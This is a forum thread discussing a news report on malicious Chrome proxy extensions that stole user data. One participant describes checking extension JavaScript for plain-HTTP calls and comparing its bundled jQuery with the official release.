Malicious Chrome Extensions Caught Stealing Sensitive Data

[Monroe]

Just for reading ... not much of a chrome person.

https://www.foxnews.com/tech/malicious-chrome-extensions-caught-stealing-sensitive-data

Malicious Chrome extensions caught stealing sensitive data

Kurt Knutsson, CyberGuy Report / January 5, 2026

Chrome extensions are supposed to make your browser more useful, but they've quietly become one of the easiest ways for attackers to spy on what you do online. Security researchers recently uncovered two Chrome extensions that have been doing exactly that for years.

These extensions looked like harmless proxy tools, but behind the scenes, they were hijacking traffic and stealing sensitive data from users who trusted them. What makes this case worse is where these extensions were found. Both were listed on Chrome's official extension marketplace.

... just adding, the comments at the bottom of the article page are many and interesting. They number around 393 at this time. They take a little time to load, that's why I did not see them when I first posted the article.

...

Edited yesterday at 12:39 PM by Monroe
add at end,

[NotHereToPlayGames]

Interesting!  These are actually quite easy to prevent!

I never (and I do mean *NEVER*) install extensions via Chrome Web Store.

It's sad that we have to jump through these hoops, but in the case of the discussed "Phantom Shuttle" extension (no longer available on CWS but still available at crx4chrome), it really is VERY EASY to prevent these types of telemetry.  Whether you want to see if your extension is contacting AD SERVERS or whether you want to see if any TELEMETRY is being collected, it really is VERY EASY.

This isn't some old-dog new-trick complexity either.

Just drag-and-drop *ALL* .js files contained within the extension to Notepad++ then search-all for http:// (important to note that there is NO "S", search for http, not https).

In the case of "Phantom Shuttle" (v3.1.9 was the one I tested, most recent on crx4chrome), there are TWENTY TWO of them.  Some legit, others not.

This isn't 1990!  Generally speaking, NOTHING should ever be communicated on http versus https!

The extension is doing this http traffic so that your browser doesn't throw a "certificate error".

Extensions should *NEVER* need to communicate via http.

Doesn't mean that the mere presence of http over https is a legit concern, but does show you what to watch for in your network traffic logs.

Or, at minimum, a gauge for those that do not monitor such logs.

It's not a tell-tale, but you learn over time just what to look for.

I always (*always*) modify my extensions (ie, prevent phone-home auto-update checks, prevent visits to home page at install/uninstall, etc).

Sad, but we do live in an age where you have to take some steps to safeguard yourself, the "nanny state" doesn't have your best interests in mind, they have their own agenda.

[NotHereToPlayGames]

I couldn't find anything "suspicious" in the extensions embedded "jQuery v1.12.2" (jquery-1.12.2.min.js) [cited in the article as the root cause].

The CDN that publishes these jQuery files is public - ie, here -- https://blog.jquery.com/2016/03/17/jquery-1-12-2-and-2-2-2-released/

The "v1.12.2" in the extension and the "v1.12.2" from the official blog are DRASTICALLY DIFFERENT.

To be fair, this is my first comparison of an extension's jQuery to the blog's jQuery.

But if the two files identify as the SAME VERSION, I certainly wouldn't expect so many DIFFERENCES.